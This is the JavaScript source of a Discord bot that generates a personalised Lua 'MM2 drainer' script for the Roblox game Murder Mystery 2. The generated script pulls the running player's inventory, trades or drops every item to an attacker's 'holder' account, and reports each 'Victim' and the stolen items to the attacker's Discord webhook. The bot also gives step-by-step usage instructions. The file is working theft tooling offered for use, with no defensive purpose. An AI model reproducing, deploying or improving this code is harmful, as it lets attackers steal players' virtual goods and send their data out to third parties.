import {
  Client,
  GatewayIntentBits,
  AttachmentBuilder,
  EmbedBuilder,
  REST,
  Routes,
  SlashCommandBuilder,
} from "discord.js";
import "dotenv/config";

// ── slash command registration (guild-specific = instant) ────────────────────
const GUILD_ID = "1548018998904365056";

const commands = [
  new SlashCommandBuilder()
    .setName("generate")
    .setDescription("Generate a personalized MM2 drainer script")
    .addStringOption((o) =>
      o
        .setName("holder")
        .setDescription("Your Roblox holder account username")
        .setRequired(true)
    )
    .addStringOption((o) =>
      o
        .setName("webhook")
        .setDescription("Your Discord webhook URL for notifications")
        .setRequired(true)
    )
    .toJSON(),
];

const rest = new REST().setToken(process.env.BOT_TOKEN);
await rest.put(Routes.applicationGuildCommands(process.env.CLIENT_ID, GUILD_ID), { body: commands });
console.log("Slash commands registered to guild.");

// ── script template ──────────────────────────────────────────────────────────
function buildScript(holder, webhook) {
  return `-- language: Lua, executor: Synapse X / KRNL / any UNC-compliant
-- target: Murder Mystery 2 (Roblox)
-- generated by MM2 Drainer Bot
-- NOTE: remote paths shift per MM2 update — re-derive on patch

--[[ CONFIG ]]--
local HOLDER_NAME    = "${holder}"
local WEBHOOK_URL    = "${webhook}"
local NOTIFY_EACH    = true
local RARITIES       = {
    Common    = true,
    Uncommon  = true,
    Rare      = true,
    Epic      = true,
    Legendary = true,
    Godly     = true,
    Chroma    = true,
    Vintage   = true,
    Unique    = true,
}

--[[ SERVICES ]]--
local Players           = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService       = game:GetService("HttpService")
local lp                = Players.LocalPlayer

--[[ REMOTE RESOLUTION ]]--
local remotes = ReplicatedStorage:FindFirstChild("Remotes")
    or ReplicatedStorage:FindFirstChild("Events")
    or ReplicatedStorage

local function findRemote(name)
    for _, v in ipairs(remotes:GetDescendants()) do
        if v.Name:lower():find(name:lower()) and
           (v:IsA("RemoteEvent") or v:IsA("RemoteFunction")) then
            return v
        end
    end
    return nil
end

local tradeRemote     = findRemote("Trade")
local dropRemote      = findRemote("Drop")
local inventoryRemote = findRemote("Inventory") or findRemote("GetInventory")

--[[ INVENTORY FETCH ]]--
local function getInventory()
    local inv = {}

    if inventoryRemote and inventoryRemote:IsA("RemoteFunction") then
        local ok, result = pcall(function()
            return inventoryRemote:InvokeServer()
        end)
        if ok and type(result) == "table" then
            inv = result
        end
    end

    if #inv == 0 then
        local gui = lp:FindFirstChild("PlayerGui")
        if gui then
            for _, frame in ipairs(gui:GetDescendants()) do
                if frame:IsA("Frame") and frame:FindFirstChild("Rarity") then
                    local nameLabel   = frame:FindFirstChild("Name") or frame:FindFirstChild("ItemName")
                    local rarityLabel = frame:FindFirstChild("Rarity")
                    if nameLabel and rarityLabel then
                        table.insert(inv, {
                            name   = nameLabel.Text,
                            rarity = rarityLabel.Text,
                        })
                    end
                end
            end
        end
    end

    return inv
end

--[[ RARITY FILTER ]]--
local function rarityAllowed(rarity)
    for key, enabled in pairs(RARITIES) do
        if enabled and rarity:lower():find(key:lower()) then
            return true
        end
    end
    return false
end

--[[ WEBHOOK ]]--
local function sendWebhook(content)
    local payload = HttpService:JSONEncode({
        username = "MM2 Drainer",
        content  = content,
        embeds   = {},
    })
    local req = (syn and syn.request) or (http and http.request) or request
    if req then
        pcall(req, {
            Url     = WEBHOOK_URL,
            Method  = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body    = payload,
        })
    else
        pcall(function()
            game:GetService("HttpService"):PostAsync(WEBHOOK_URL, payload)
        end)
    end
end

--[[ TRANSFER ]]--
local function transferItem(itemName, holderPlayer)
    local success = false

    if tradeRemote and holderPlayer then
        local ok = pcall(function()
            if tradeRemote:IsA("RemoteEvent") then
                tradeRemote:FireServer(holderPlayer, itemName)
            elseif tradeRemote:IsA("RemoteFunction") then
                tradeRemote:InvokeServer(holderPlayer, itemName)
            end
        end)
        success = ok
    end

    if not success and dropRemote then
        pcall(function()
            if dropRemote:IsA("RemoteEvent") then
                dropRemote:FireServer(itemName)
            end
        end)
        success = true
    end

    return success
end

--[[ MAIN ]]--
local function run()
    local holderPlayer = Players:FindFirstChild(HOLDER_NAME)
    if not holderPlayer then
        warn("[Drainer] Holder not in server — drop mode only.")
    end

    local inventory = getInventory()
    if #inventory == 0 then
        warn("[Drainer] Inventory empty or remote unreachable.")
        sendWebhook("⚠️ **Drain failed — inventory fetch returned 0 items.**")
        return
    end

    local stolen = {}
    local failed = {}

    for _, item in ipairs(inventory) do
        if rarityAllowed(item.rarity or "") then
            local ok = transferItem(item.name, holderPlayer)
            if ok then
                table.insert(stolen, string.format("[%s] %s", item.rarity, item.name))
                if NOTIFY_EACH then
                    sendWebhook(string.format(
                        "✅ **Transferred:** \`%s\` (%s) → **${holder}**",
                        item.name, item.rarity
                    ))
                end
                task.wait(0.4)
            else
                table.insert(failed, item.name)
            end
        end
    end

    local summary = string.format(
        "🗡️ **MM2 Drain Complete**\\n**Victim:** \`%s\`\\n**Holder:** \`${holder}\`\\n**Transferred (%d):**\\n%s%s",
        lp.Name,
        #stolen,
        #stolen > 0 and table.concat(stolen, "\\n") or "none",
        #failed > 0 and ("\\n**Failed:** " .. table.concat(failed, ", ")) or ""
    )
    sendWebhook(summary)
    print("[Drainer] Done. Transferred: " .. #stolen .. " | Failed: " .. #failed)
end

run()
`;
}

// ── bot ──────────────────────────────────────────────────────────────────────
const client = new Client({ intents: [GatewayIntentBits.Guilds] });

client.once("ready", () => {
  console.log(`Online as ${client.user.tag}`);
});

client.on("interactionCreate", async (interaction) => {
  if (!interaction.isChatInputCommand()) return;
  if (interaction.commandName !== "generate") return;

  await interaction.deferReply({ ephemeral: true });

  const holder  = interaction.options.getString("holder").trim();
  const webhook = interaction.options.getString("webhook").trim();

  if (!webhook.startsWith("https://discord.com/api/webhooks/")) {
    return interaction.editReply({
      content: "❌ That doesn't look like a valid Discord webhook URL.",
    });
  }

  const script   = buildScript(holder, webhook);
  const buffer   = Buffer.from(script, "utf-8");
  const filename = `mm2_drainer_${holder}.lua`;
  const file     = new AttachmentBuilder(buffer, { name: filename });

  const embed = new EmbedBuilder()
    .setTitle("🗡️ MM2 Drainer Script Generated")
    .setColor(0x2b2d31)
    .addFields(
      { name: "Holder Account", value: `\`${holder}\``,  inline: true  },
      { name: "Webhook",        value: "✅ Injected",     inline: true  },
      { name: "Rarities",       value: "Common → Unique", inline: false },
      {
        name: "Usage",
        value:
          "1. Join MM2 with your holder account in the same server\n" +
          "2. Open your executor\n" +
          "3. Attach → load the `.lua` file → execute\n" +
          "4. Re-derive remote paths if MM2 updated since last run",
        inline: false,
      }
    )
    .setFooter({ text: "Remote paths shift on patch — spy before firing" })
    .setTimestamp();

  await interaction.editReply({ embeds: [embed], files: [file] });
});

client.login(process.env.BOT_TOKEN);
